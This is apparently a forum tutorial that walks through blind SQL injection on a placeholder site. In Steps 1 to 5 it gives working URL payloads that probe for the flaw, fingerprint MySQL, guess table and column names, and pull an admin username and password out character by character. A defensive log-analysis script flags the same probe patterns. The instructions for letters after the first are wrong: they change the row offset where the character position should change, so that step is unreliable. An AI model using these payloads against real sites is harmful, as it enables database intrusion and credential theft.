Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities



Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:


Code:

site.com/index.php?id=1


To find out whether it's vulnerable we will run a little test.

For that we will append some strings to the parameter. As everybody knows, the number 1 is equal to 1, but not to 2.

Therefore we will compare these two URLs:


Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2


If "and 1=1" loads perfectly, but "and 1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The MySQL Version



This isn't of much use in this kind of injection, but it might come in handy.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find out which, do this:


Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4

If one of them loads without missing any content, that's the version.

(You can do the same with the database name and user)



Step 3 Guessing The Table Names



As you can see, guessing is important in blind SQLi. That's also needed for the table and its columns :p

To get the right table you'll have to guess it this way:

Quote:

site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1

Insert your guessed table name in place of "insert table here". If the website loads without content missing, then the table exists.



Suppose we've got this:


Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table



We will now guess the columns in that table (in our example: admin).



Do this:

Quote:

site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1

Replace "guessed column" with the column name you want to test and "table" with the table you found.


This is an example:


Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1


Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns



Note: You can do the same with some tools, but I prefer to do it manually.



For this we wrap the selected value in ascii() and guess its character code.

Note that each time you do this, you'll get one letter.



Do this:

Quote:

site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number

Replace "column 1" and "column 2" with the columns you found, "table" with the table, and "char number" with the ASCII code you are guessing.


Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website loads with some content missing.

So the first number that loads false after a number that loads true is the right char.



Suppose that it's 85.



The example would be:


Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85


To get the first letter of username:password you'll have to use an ASCII table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ASCII table) and look up the "chr".



That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and onwards you will have to change the number in the syntax as shown:

Quote:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)



etc.


You'll notice you've reached the end when (number),1 isn't giving any information anymore.



Suppose we've now found that the username:password = UserAdmin:BagelJuice
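From the defender's side, the whole procedure above leaves a very recognisable trail in the web server's access log. As an added example (not part of the original post), the following Python script parses a few constructed combined-log-style lines, flags the probe families used in Steps 1 to 5 (the 1=1 / 1=2 tautology pair, substring(@@version,...) fingerprinting and ascii(substring(...)) character extraction), and checks whether a client's 1=1 and 1=2 requests got responses of different sizes, which is the "missing content" signal Step 1 relies on. The log format, IP addresses and sizes are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not real traffic). The probes mirror the
# boolean-based payloads walked through above: 1=1 / 1=2, @@version, ascii(substring(...)).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20and%201=2 HTTP/1.1" 200 1880
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20and%20ascii(substring((select%20concat(username,0x3a,password)%20from%20admin%20limit%200,1),1,1))%3E85 HTTP/1.1" 200 1880
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=7 HTTP/1.1" 200 5011
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) \S+" \d{3} (?P<size>\d+)')

# One regex per probe family used in the tutorial; the tautology group captures the 1 or 2.
SIGNATURES = {
    "tautology": re.compile(r"\band\s+1\s*=\s*([12])\b", re.I),
    "fingerprint": re.compile(r"substring\s*\(\s*@@version", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
}

def parse(log_text):
    """Yield (ip, decoded query string, response size); unparseable lines are skipped."""
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        # decode %20, %3E etc. so the SQL fragment is visible to the signatures
        yield m.group("ip"), unquote_plus(urlsplit(m.group("uri")).query), int(m.group("size"))

def classify(query):
    """Names of the signature families that match one decoded query string."""
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def analyze(log_text):
    """Per client IP: matched families, plus whether its 1=1 / 1=2 pair produced different
    response sizes (the content difference a blind probe looks for, seen from the server)."""
    state = defaultdict(lambda: {"hits": set(), "sizes": {}})
    for ip, query, size in parse(log_text):
        st = state[ip]
        st["hits"] |= classify(query)
        m = SIGNATURES["tautology"].search(query)
        if m:
            st["sizes"][m.group(1)] = size  # response size for the 1=1 or 1=2 variant
    report = {}
    for ip, st in state.items():
        s = st["sizes"]
        differential = "1" in s and "2" in s and s["1"] != s["2"]
        report[ip] = {"hits": sorted(st["hits"]), "pair_differential": differential}
    return report
```

A client that trips the pair differential and the char_extraction family within a short window is worth alerting on, and the same request shapes are easy to block at a WAF or to make harmless by using prepared statements in index.php.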



--



Outro



Thank you very much for reading this tutorial. If there are any questions, or you feel like I forgot something, please feel free to post them here.

Also please report any grammatical errors, as I try to dodge them.



I hope I helped you with this thread.